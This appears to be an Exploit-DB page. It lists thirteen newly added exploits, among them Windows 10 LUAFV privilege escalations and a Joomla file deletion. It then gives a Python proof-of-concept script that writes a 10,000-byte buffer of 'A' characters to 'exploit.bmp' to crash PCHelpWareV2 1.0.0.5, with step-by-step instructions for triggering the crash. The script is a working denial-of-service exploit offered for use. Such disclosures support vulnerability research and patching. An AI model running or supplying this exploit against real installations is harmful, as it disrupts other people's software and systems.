
13 changes to exploits/shellcodes PCHelpWare V2 1.0.0.5 - 'SC' Denial of Service (PoC) PCHelpWare V2 1.0.0.5 - 'Group' Denial of Service (PoC) AdminExpress 1.2.5 - 'Folder Path' Denial of Service (PoC) Zoho ManageEngine ADManager Plus 6.6 (Build < 6659) - Privilege Escalation Microsoft Windows 10 1809 / 1709 - CSRSS SxSSrv Cached Manifest Privilege Escalation Microsoft Windows 10 1809 - LUAFV Delayed Virtualization MAXIMUM_ACCESS DesiredAccess Privilege Escalation Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cross Process Handle Duplication Privilege Escalation Microsoft Windows 10 1809 - LUAFV LuafvCopyShortName Arbitrary Short Name Privilege Escalation Microsoft Windows 10 1809 - LUAFV NtSetCachedSigningLevel Device Guard Bypass Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cache Manager Poisoning Privilege Escalation Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation Zyxel ZyWall 310 / ZyWall 110 / USG1900 / ATP500 / USG40 - Login Page Cross-Site Scripting Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion
22 lines
No EOL
726 B
Python
Executable file
22 lines
No EOL
726 B
Python
Executable file
# -*- coding: utf-8 -*-
|
|
# Exploit Title: PCHelpWareV2 1.0.0.5 - 'SC' Denial of Service (PoC)
|
|
# Date: 15/04/2019
|
|
# Author: Alejandra Sánchez
|
|
# Vendor Homepage: https://www.uvnc.com/home.html
|
|
# Software Link: http://www.uvnc.eu/download/pchw2/PCHelpWareV2.msi
|
|
# Version: 1.0.0.5
|
|
# Tested on: Windows 10
|
|
|
|
# Proof of Concept:
|
|
# 1.- Run the python script "PCHelpWareV2_create_.py", it will create a image "exploit.bmp"
|
|
# 2.- Open PCHelpWareV2 Viewer
|
|
# 3.- Go to Tools -> Create SC
|
|
# 4.- Click on button -> Browse (any "Browse" button), and select the 'exploit.bmp' image created
|
|
# 5.- Click on button -> Create SC
|
|
# 6.- Crashed
|
|
|
|
buffer = "\x41" * 10000
|
|
|
|
f = open ("exploit.bmp", "w")
|
|
f.write(buffer)
|
|
f.close() |